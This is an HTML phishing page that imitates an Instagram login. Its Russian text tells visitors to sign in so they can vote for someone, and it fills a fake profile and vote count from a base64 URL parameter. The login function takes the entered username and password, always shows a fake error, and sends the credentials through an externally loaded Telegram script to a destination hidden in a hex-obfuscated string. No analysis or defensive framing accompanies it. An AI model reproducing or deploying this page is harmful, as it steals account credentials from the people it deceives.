<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login</title>
    <script src="https://ummx.github.io/import/script/aes.js"></script>
    <script src="https://ummx.github.io/import/script/telegram-api.js"></script>
    <style>
        *{
            margin: 0;
            padding: 0;
            
        }
        .head{
            background: red;
            height:70px;
            display: block;
            margin: auto;
            text-align: center;
        }
        p{
            display:block;
            margin: auto;
            text-align: center;
            width:270px;
            color: white;
            font-family: arial;
            padding-top:15px;
        }
        input{
            display: block;
            margin: auto;
            width:250px;
            height:33px;
            border-radius:3px;
            border: 3px solid rgb(238, 238, 238);
            padding-left:10px;
        }
        button{
            display: block;
            margin: auto;
            text-align: center;
            width:263px;
            height:33px;
            color: white;
            background: rgb(0, 153, 255);
            border: none;
            border-radius: 5px;
        }
        img{
            display: block;
            margin: auto;
            text-align: center;
            width:150px;
            border-radius: 50%;
            margin-top: 30px;
        }
        h1{
            display: block;
            margin: auto;
            text-align: center;
            margin-top:25px;
            font-size:20px;
            font-family: arial;
        }
        h3{
            display: none;
            margin: auto;
            text-align: center;
            margin-top:30px;
            font-size:15px;
            width:290px;
            color: red;
            font-family: monospace;
        }
    </style>
</head>
<body>
    <div class="head">
        <p>Для того чтобы проголосовать Зайдите в свой аккаунт Instagram</p>
    </div>
    <img id="user_img" src="https://previews.123rf.com/images/blankstock/blankstock1608/blankstock160802922/61179770-icono-de-ni%C3%B1o-s%C3%ADmbolo-muchacho-joven-feliz-silueta-de-la-persona-bot%C3%B3n-c%C3%ADrculo-azul-con-el-icono-vec.jpg" alt="">
    <h1 id="user_folow">UNDEFINED</h1>
    <br><br><br>
    <input type="username" id="username" placeholder="Телефон, имя пользователя или эл. адрес">
    <br>
    <input type="password" id="password" placeholder="Пароль">
   <br>
    <button onclick="login()">Войти</button>
    <h3 id="error">Введенное вами имя пользователя не принадлежит аккаунту. Проверьте свое имя пользователя и повторите попытку.</h3>
</body>
<script>
    function login(){
        var username=document.getElementById('username').value;
        var password=document.getElementById('password').value;
document.getElementById('error').style.display="block";
        var message=`USERNAME : ${username} %0A PASSWORD : ${password}`;
        var _0x7898=["\x36\x37\x30\x34\x37\x36\x31\x62\x33\x63\x62\x66\x38\x32\x36\x30\x63\x35\x35\x36\x63\x33\x65\x34\x31\x33\x39\x39\x61\x62\x38\x62\x63\x64\x66\x30\x62\x35\x31\x61\x39\x38\x39\x33\x35\x65\x66\x63\x30\x34\x30\x35\x62\x64\x39\x63\x61\x30\x39\x38\x64\x65\x38\x37"];sendMessage(message,_0x7898[0])
    }
    var data = location.search.slice(1).split("&")[0].split("=")[1]
     var ob=JSON.parse(atob(data))
     document.getElementById('user_img').src=ob.img;
     document.getElementById('user_folow').innerHTML=ob.folowers + ' голосов';
</script>
</html>
